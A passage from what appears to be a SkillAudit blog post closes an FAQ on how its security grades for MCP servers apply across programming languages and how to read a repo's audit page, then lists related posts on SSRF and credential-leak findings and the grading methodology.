Are these patterns specific to TypeScript / JavaScript MCP servers? No. The patterns are language-agnostic. The 19 A-grade repos include TypeScript (LangChain, Microsoft Playwright, Vectara, and fetch-mcp, whose finding above is in src/Fetcher.ts), Python (Pinecone, Qdrant, Milvus, Snowflake, FastAPI-MCP, and Vectara's Python code), Go (some indirectly), and combinations. The static checks the engine runs are language-aware (different AST shapes for fetch(url) in TS vs requests.get(url) in Python) but the underlying patterns are the same. Maintainers in any language can use the checklist above.
How do I read the audit page for my repo if I don't recognise some of the section headings? The methodology page documents every section. The most important: the surface-tier headings under each axis section show where in the source tree each finding lives. Production sources is the one that drives most of the deduction; everything below (installer, examples, benchmarks, scripts, test) deducts at lower weights and rarely changes the letter grade by itself.
Related reading
- We scanned 52 MCP servers — 56% had SSRF, 44% leaked credentials — the aggregate research findings post that defined the methodology this list builds on.
- 29 vendor-official MCP servers earned an F — every name, every file path — the structural counterpart to this post: the same five patterns, but where they fail.
- The MCP install shortlist — 19 community servers that earn an A — the buyer-side companion that names every A-grade repo with a one-paragraph use-case writeup.
- Block 52 of 101 community MCP servers with one CI gate — the team-lead policy template that gates installs on a minimum SkillAudit grade.
- Engine v0.3 calibration delta — 22 grades moved when surface tiering shipped — the engineering record of the calibration update that defined the production / examples / tests / benchmarks surface tiers used throughout this post.
- Methodology — how SkillAudit grades MCP servers and Claude skills (v0.3) — the canonical rubric, including the deduction matrix and worked examples.
- The public audit board — every grade in the 101-repo corpus, every finding linked.